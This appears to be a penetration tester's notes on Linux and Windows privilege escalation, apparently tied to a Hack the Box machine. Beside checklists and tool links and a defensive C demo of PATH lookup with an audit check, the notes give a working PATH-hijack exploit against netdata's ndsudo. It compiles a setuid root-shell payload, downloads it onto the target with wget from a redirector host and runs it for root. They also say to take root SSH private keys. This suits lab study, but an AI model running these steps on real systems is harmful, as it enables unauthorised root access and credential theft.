# **Basic Information**

# **Linux**

- `sudo -l`
- [GTFOBins](https://gtfobins.github.io/)
- `bash_history`
- Password reuse
- Look for SSH keys
  - `/home/<user>/.ssh/id_rsa`
  - `/root/.ssh/id_rsa`
  - Also check for `id_dsa`, `id_ecdsa`, `id_ed25519`, `identity`
  - `chmod 600 id_rsa` then connect with `ssh root@<target_ip> -i id_rsa`

## **Checklists**

- [HackTricks Linux Checklist](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)
- [PayloadAllTheThings Linux Checklist](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)

## **Scripts**

- [LinEnum](https://github.com/rebootuser/LinEnum)
- [linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)

## **Kernel Exploits**

- CVE-2016-5195 ([DirtyCow](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs))

## **Exploiting the `PATH` Environment Variable**

Exploiting the `PATH` environment variable for local privilege escalation (LPE) is a technique used on Linux systems when a privileged program (for example a setuid helper) invokes another program by bare name instead of by its full, absolute path. Because the lookup walks `PATH` left to right, an attacker who prepends a directory they control can have a malicious version of the program executed instead of the legitimate one, gaining elevated privileges.
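To make the mechanism concrete from the defensive side, the following added C example (not code from the original notes, and not netdata's or any project's code) emulates the `PATH` lookup a privileged helper performs for an unqualified command name, contrasts it with a lookup over a fixed trusted search list, and includes a small audit check for `PATH` entries a privileged process should not trust. The `TRUSTED_PATH` value, the function names and the constructed file-system stand-in are assumptions made for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Fixed search list a privileged helper should use instead of the PATH it
   inherits from its caller (assumed value for a standard Linux layout). */
#define TRUSTED_PATH "/usr/sbin:/usr/bin:/sbin:/bin"

/* The existence check is a callback so the demo runs offline on constructed data. */
typedef int (*exists_fn)(const char *candidate);

/* Emulate what execvp() (and the shell) do with an unqualified command name:
   walk the colon-separated list left to right and return the first entry
   that exists. Writes the winning path to out and returns 0, or -1 if none. */
int resolve_in_path(const char *name, const char *path, exists_fn exists,
                    char *out, size_t outlen)
{
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        char cand[4096];
        if (len == 0)   /* an empty entry means "current directory" */
            snprintf(cand, sizeof cand, "./%s", name);
        else
            snprintf(cand, sizeof cand, "%.*s/%s", (int)len, p, name);
        if (exists(cand)) {
            snprintf(out, outlen, "%s", cand);
            return 0;
        }
        if (sep == NULL)
            return -1;
        p = sep + 1;
    }
}

/* Constructed stand-in for the file system: the legitimate binary plus a
   copy an unprivileged user dropped into a world-writable directory. */
static int constructed_exists(const char *candidate)
{
    static const char *present[] = { "/usr/sbin/nvme", "/tmp/nvme", NULL };
    for (int i = 0; present[i] != NULL; i++)
        if (strcmp(candidate, present[i]) == 0)
            return 1;
    return 0;
}

/* Vulnerable pattern: the privileged helper searches whatever PATH it
   inherited, so a caller-controlled entry placed first wins. */
int lookup_trusting_caller_path(const char *name, const char *inherited_path,
                                char *out, size_t outlen)
{
    return resolve_in_path(name, inherited_path, constructed_exists, out, outlen);
}

/* Hardened pattern: the inherited PATH is never consulted. */
int lookup_with_fixed_path(const char *name, char *out, size_t outlen)
{
    return resolve_in_path(name, TRUSTED_PATH, constructed_exists, out, outlen);
}

/* Audit check for the PATH a privileged process inherits: flags empty or
   relative entries (they resolve against the current directory) and the
   usual user-writable locations. Returns 1 if anything is flagged, else 0. */
int path_has_untrusted_entry(const char *path)
{
    static const char *writable_prefixes[] = { "/tmp", "/var/tmp", "/dev/shm", "/home", NULL };
    const char *p = path;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        for (int i = 0; writable_prefixes[i] != NULL; i++) {
            size_t plen = strlen(writable_prefixes[i]);
            if (len >= plen && strncmp(p, writable_prefixes[i], plen) == 0 &&
                (len == plen || p[plen] == '/'))
                return 1;
        }
        if (sep == NULL)
            return 0;
        p = sep + 1;
    }
}

int main(void)
{
    char found[4096];
    if (lookup_trusting_caller_path("nvme", "/tmp:/usr/sbin:/usr/bin", found, sizeof found) == 0)
        printf("inherited PATH resolves nvme to %s\n", found);
    if (lookup_with_fixed_path("nvme", found, sizeof found) == 0)
        printf("fixed search list resolves nvme to %s\n", found);
    printf("untrusted entry in /tmp:/usr/sbin:/usr/bin? %d\n",
           path_has_untrusted_entry("/tmp:/usr/sbin:/usr/bin"));
    return 0;
}
```

Build with `gcc -Wall path_demo.c -o path_demo`. The fix for a privileged helper is the second pattern: either call the tool by absolute path or search only a fixed, root-owned list; resetting `PATH` with `setenv` before an `execvp` achieves the same thing. The audit function is what a detection or hardening script would run against the environment of setuid binaries and root cron jobs.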
```bash
# ran on the op station
cat > payload.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
EOF
gcc -static payload.c -o www/nvme -Wall -Werror -Wpedantic
```

```bash
# ran on target
wget http://<redir_ip>/nvme -O /tmp/nvme
chmod +x /tmp/nvme
PATH=/tmp:$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

# **Windows**

- [LOLBAS](https://lolbas-project.github.io/#)
- `PSReadLine`
- Password reuse

## **Checklists**

- [HackTricks Windows Checklist](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html)
- [PayloadAllTheThings Windows Checklist](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)

## **Scripts**

- [Seatbelt](https://github.com/GhostPack/Seatbelt)
- [JAWS](https://github.com/411Hall/JAWS)

# **References**

# **Practical Application**

| Platform | Name | Notes |
| ------------ | ---------- | ----- |
| Hack the Box | [[Editor]] | |